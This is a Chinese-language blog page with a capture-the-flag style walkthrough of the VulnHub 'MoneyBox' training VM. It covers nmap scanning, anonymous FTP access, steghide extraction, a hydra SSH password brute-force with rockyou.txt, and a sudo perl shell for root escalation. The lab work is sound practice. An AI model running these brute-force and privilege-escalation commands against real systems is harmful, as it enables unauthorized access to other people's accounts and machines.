<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>box靶机 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="下载Oracle VMNVirtual Box可以理解为VMware mini 下载menoy box虚拟机虚拟机地址： http:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;moneybox-1,653&#x2F;#download 导入虚拟机，设置一下Oracle VMNVirtual Box，网络和usb设备需要设置，如下图   kali设置1、编辑-虚拟网络编辑器 2、更改设置—–vment0桥">
<meta property="og:type" content="article">
<meta property="og:title" content="box靶机">
<meta property="og:url" content="http://example.com/2024/01/08/box%E9%9D%B6%E6%9C%BA/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="下载Oracle VMNVirtual Box可以理解为VMware mini 下载menoy box虚拟机虚拟机地址： http:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;moneybox-1,653&#x2F;#download 导入虚拟机，设置一下Oracle VMNVirtual Box，网络和usb设备需要设置，如下图   kali设置1、编辑-虚拟网络编辑器 2、更改设置—–vment0桥">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081021805.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081022320.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081022338.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081023737.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081024108.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081025075.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081025409.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081025902.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081026249.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081026330.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081027938.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081027122.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081426018.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081426374.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081426202.png">
<meta property="article:published_time" content="2024-01-08T02:21:23.000Z">
<meta property="article:modified_time" content="2024-01-08T06:26:54.349Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081021805.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-box靶机" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/01/08/box%E9%9D%B6%E6%9C%BA/" class="article-date">
  <time class="dt-published" datetime="2024-01-08T02:21:23.000Z" itemprop="datePublished">2024-01-08</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      box靶机
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="下载Oracle-VMNVirtual-Box"><a href="#下载Oracle-VMNVirtual-Box" class="headerlink" title="下载Oracle VMNVirtual Box"></a>下载Oracle VMNVirtual Box</h1><p>可以理解为VMware mini</p>
<h1 id="下载menoy-box虚拟机"><a href="#下载menoy-box虚拟机" class="headerlink" title="下载menoy box虚拟机"></a>下载menoy box虚拟机</h1><p>虚拟机地址：</p>
<p><a target="_blank" rel="noopener" href="http://www.vulnhub.com/entry/moneybox-1,653/#download">http://www.vulnhub.com/entry/moneybox-1,653/#download</a></p>
<p>导入虚拟机，设置一下Oracle VMNVirtual Box，网络和usb设备需要设置，如下图</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081021805.png" alt="image-20240108102152562"></p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081022320.png" alt="image-20240108102210219"></p>
<h1 id="kali设置"><a href="#kali设置" class="headerlink" title="kali设置"></a>kali设置</h1><p>1、编辑-虚拟网络编辑器</p>
<p>2、更改设置—–vment0桥接模式 virtualbox</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081022338.png" alt="image-20240108102230823"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ifdown eth0          //关闭网卡</span><br><span class="line">ifup eth0            //开启网卡</span><br></pre></td></tr></table></figure>

<h1 id="靶机"><a href="#靶机" class="headerlink" title="靶机"></a>靶机</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l -I eth0 本地网络上执行ARP扫描。它将显示与您的eth0网络接口关联的本地IP地址和MAC地址的列表</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081023737.png" alt="image-20240108102346591"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">nmap -p- 192.168.56.101</span><br><span class="line"></span><br><span class="line">nmap: 这是网络映射器（Network Mapper）的缩写，是一个用于网络发现和安全审计的开源工具。</span><br><span class="line">-p-: 这个选项指示Nmap扫描所有可能的端口，而不是只扫描一些常见的端口。在这里，连字符（-）表示范围，而没有具体的端口号，因此表示扫描所有1到65535的端口。</span><br><span class="line">192.168.56.101: 这是目标主机的IP地址，是要进行端口扫描的目标。</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081024108.png" alt="image-20240108102437132"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -p 21,22,80 -sC 192.168.56.101 -p 21,22,80: 这个选项指示Nmap只扫描指定的端口，这里是21（FTP）、22（SSH）、80（HTTP）。逗号分隔的端口列表表示仅扫描这些端口。 -sC: 这个选项启用了默认的脚本扫描。Nmap脚本引擎允许用户运行一系列脚本，以执行各种任务，如服务识别、漏洞探测等。</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081025075.png" alt="image-20240108102510865"></p>
<p>发现ftp拥有允许匿名ftp登录的漏洞，Anonymous:Anonymous登录</p>
<p>下载文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ftp 192.168.56.101    --使用FTP（文件传输协议）连接到位于IP地址为192.168.56.101的主机 ls help</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081025409.png" alt="image-20240108102533376"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">get trytofind.jpg</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081025902.png" alt="image-20240108102552939"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">strings trytofind.jpg   strings trytofind.jpg 是一个命令行工具的使用，用于从文件中提取可打印字符序列，通常用于查看二进制文件中的文本信息。</span><br><span class="line">steghide info trytofind.jpg steghide 是一个用于隐藏数据在图像中的工具。steghide info 命令用于检索图像中隐藏的信息，但仅适用于使用 Steghide 工具进行隐藏的数据</span><br></pre></td></tr></table></figure>

<p>发现的确藏了文件，但是缺少一个密钥，去访问下80端口吧</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081026249.png" alt="image-20240108102618301"></p>
<p>没有什么东西</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u 192.168.56.101  -x 403,404,401 -u 192.168.56.101: 指定目标URL或IP地址，即要进行目录和文件枚举的目标web服务器的地址。 -x 403,404,401: 指定要排除的HTTP响应代码。</span><br></pre></td></tr></table></figure>

<p>访问<a target="_blank" rel="noopener" href="http://192.168.56.101/blogs/">http://192.168.56.101/blogs/</a></p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081026330.png" alt="image-20240108102649132"></p>
<p>右键点击查看源代码</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081027938.png" alt="image-20240108102706012"></p>
<p>有一个提示，把网址改成上述提示的</p>
<p>访问S3cr3t-T3xt<br>192.168.56.101&#x2F;S3cr3t-T3xt&#x2F;</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081027122.png" alt="image-20240108102723111"></p>
<p>我们可以看到出现了一个密钥，输入到之前缺少密钥的页面</p>
<p>key:3xtr4ctd4t4</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081426018.png" alt="image-20240108102752528"></p>
<p>先安装一个插件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt install steghide</span><br><span class="line">steghide info trytofind.jpg</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081426374.png" alt="image-20240108102809476"></p>
<p>榨取图片中的文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">steghide  extract -sf trytofind.jpg steghide: 这是 steghide 工具的执行命令。 extract: 这是 steghide 工具的子命令，表示你想要从图像中提取隐藏的数据。 -sf trytofind.jpg: 这个选项指定要操作的源文件。</span><br></pre></td></tr></table></figure>

<p>查看剥离出的文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">你好，雷洛 我告诉你一件很重要的事。你的密码太弱了，所以改一下吧！不要低估它…… 说明renu密码可能是弱密码</span><br></pre></td></tr></table></figure>

<p>Hydra 工具，它是一个用于暴力破解各种网络协议的密码的工具。这个具体的命令用于尝试通过 SSH 协议暴力破解给定主机上的用户名和密码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l renu -P rockyou.txt   192.168.56.101 ssh     -- cp /usr/share/wordlists/rockyou.txt.gz .        --gunzip rockyou.txt.gz     //这是个超大的密码字典    --echo  root &gt; user.txt</span><br></pre></td></tr></table></figure>

<p>我们已经知道renu的名字，直接可以指定用户名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh renu@192.168.56.101    --使用 SSH（Secure Shell）协议来建立到目标主机的安全连接 ls cat user1.txt          //获得一个flag cat .bash_history      //查看历史命令</span><br></pre></td></tr></table></figure>

<p>根据历史命令判断，当前renu账户可以通过ssh免密登录lily账户</p>
<p>发现新的flag</p>
<p><img src="https://raw.githubusercontent.com/lzqnbnb/lsp/main/img/202401081426202.png" alt="image-20240108103028933"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh lily@192.168.56.101</span><br></pre></td></tr></table></figure>

<p>进入到lily的账户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls cat user2.txt</span><br></pre></td></tr></table></figure>

<p>发现了第二个flag，下一个flag的话，可能在root用户里面，我们需要提升权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l sudo perl -e &#x27;exec &quot;/bin/bash&quot;;&#x27; id</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a> 搜索perl</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /root                //切换到root的目录下 ls -al cat .root.txt</span><br></pre></td></tr></table></figure>

<p>完成实验，三个flag都找到了</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/01/08/box%E9%9D%B6%E6%9C%BA/" data-id="clr4slxw90007qofn27wmhs1k" data-title="box靶机" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/01/08/%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          网络基础知识
        
      </div>
    </a>
  
  
    <a href="/2024/01/08/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E4%B9%8B%E6%94%AF%E4%BB%98%E6%BC%8F%E6%B4%9E%E8%AF%A6%E8%A7%A3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">逻辑漏洞之支付漏洞详解</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/01/">January 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/12/">December 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/01/08/test-my-site/">test_my_site</a>
          </li>
        
          <li>
            <a href="/2024/01/08/Linux%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84/">Linux目录结构</a>
          </li>
        
          <li>
            <a href="/2024/01/08/%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">网络基础知识</a>
          </li>
        
          <li>
            <a href="/2024/01/08/box%E9%9D%B6%E6%9C%BA/">box靶机</a>
          </li>
        
          <li>
            <a href="/2024/01/08/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E4%B9%8B%E6%94%AF%E4%BB%98%E6%BC%8F%E6%B4%9E%E8%AF%A6%E8%A7%A3/">逻辑漏洞之支付漏洞详解</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>